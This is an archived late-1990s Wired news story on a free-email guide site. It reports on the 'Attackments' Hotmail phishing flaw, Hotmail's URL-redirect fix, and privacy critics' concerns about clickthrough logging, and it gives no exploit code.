Free Email Providers Guide -
Posty Let PostyTM, the Free
Email Provider GuyTM,
find your ideal provider
   Home | Free Email Providers | Other Free eCommunications | Help/Info | FEPG Services | Corporate
   You are here: Home -> Help/Info -> News -> News Archive -> News Story
Tuesday September 22 9:47 AM EDT Hotmail hole remains unplugged, security experts say

Hotmail hole remains unplugged, security experts say

By Michael Stutz

SAN FRANCISCO (Wired) - Security updates made last month to Microsoft's free e-mail service, Hotmail, may have failed to fix a problem, security experts say. Not only that, but privacy watchdogs fear that the fix might actually help the company analyze their users' Web browsing habits.

``The exploit that's posted on our page, to this day, still works 100 percent,'' said Tom Cervenka, who discovered the security vulnerabilities last month. An exploit is a way of broaching a security system.

Hotmail officials denied both allegations, saying that their system is both secure and private.

Cervenka said that Hotmail is still vulnerable to the ''Attackments'' bug that he discovered and made public Aug. 28. That security problem essentially dupes users into giving out their usernames and passwords by sending a rogue e-mail attachment that fakes a Hotmail login page.

While the problem technically still exists, Hotmail contends that the issue is not a bug with its product but a matter of safe e-mail practices.

``Opening attachments from strangers is a risky proposition using any e-mail system,'' said Laura Norman, a Hotmail product manager. ``That's not a Hotmail-specific issue or even a Web-based e-mail issue.''

But the company did make some changes to its system, including technical adjustments that involved modifying email. In short, Hotmail now tweaks Web addresses contained in the body text of email messages sent through the system. Under the new scheme, the numeric address ``'' is added to any URL passing through. That address is the numeric equivalent to a Web page at

When clicked, the link opens in a new browser window with a top frame that contains the Hotmail logo and the text, ``You are visiting a site outside of Hotmail. Close this new browser window to return to Hotmail.''

Norman said that the changes are meant to protect Hotmail members from malicious emails that might contain embedded JavaScript, ActiveX, and Java applets. Such an applet might install a ``sniffer'' program on a victim's computer that could record keystrokes, such as passwords.

The company's new procedure scans incoming email messages before the user receives them and filters out any hostile code. Still, an attached document could contain any number of rogue programs that could be used to harm a user's system.

But privacy watchdogs counter that, whether the company realizes it or not, it has set itself up to analyze and record user clickthrough data by redirecting Web traffic through its servers.

``By logging the links it would be rather easy for them to see, for example, if I clicked on a link to that they should add 'mac user' to my demographic data used to target ads,'' said Web developer Dannie J. Gregoire, whose browser-based Trojan horse demo is similar in principle to Hotmail's recent vulnerabilities.

``This is a move into an extremely dangerous area,'' added Jason Catlett, CEO of Junkbusters, a firm that gives away free software that blocks online marketing messages. ``It's tampering with private communications to insert a surveillance mechanism. Hotmail should take this one back to the drawing board.''

Hotmail's Norman said that the information is used to improve the security of the system and is not tracked or used in any way. ``We aren't logging these clickthroughs,'' she said.

``There's one exception to that, which is within our Web Courier service, where we send emails at a member's request for a partner,'' Norman explained. ``In those cases, the partners requested that information, links embedded in those emails.''

A better way to have done it, Gregoire said, is to use a watermark system, which would be anonymous. ``For example, a watermark identifier-a random word or icon-could be placed in an upper corner of each Hotmail page.''



New? Confused?
Start Here.

Full Site Search:
Powered by
Search our database for your ideal provider

Not from the U.S.?
Go to our listings by country.

Special Interests?
Check out our providers by category.

Information on how to get or improve free email on your site.

Posty's Notes
Messages from the Free Email Provider GuyTM.

Want Free Webspace?
Check out

FEPG Newsletter
Subscribe to our weekly newsletter.
  Book Store | Reviews | Message Boards | FAQ | Contact FEPG | Advertising Rates | Affiliate Programs  
Back to Top Copyright© Cole & Associates 1997-2001.
All Rights Reserved.

The Free Email Providers Guide makes every effort to ensure the accuracy of information presented on this site. However we make no warranty and cannot be responsible for any damages resulting from use of information from this site. Links to other websites are provided as a convenience and the Free Email Providers Guide is not responsible for the content, which is the sole responsibility of the website.

Christian Icthus fish symbol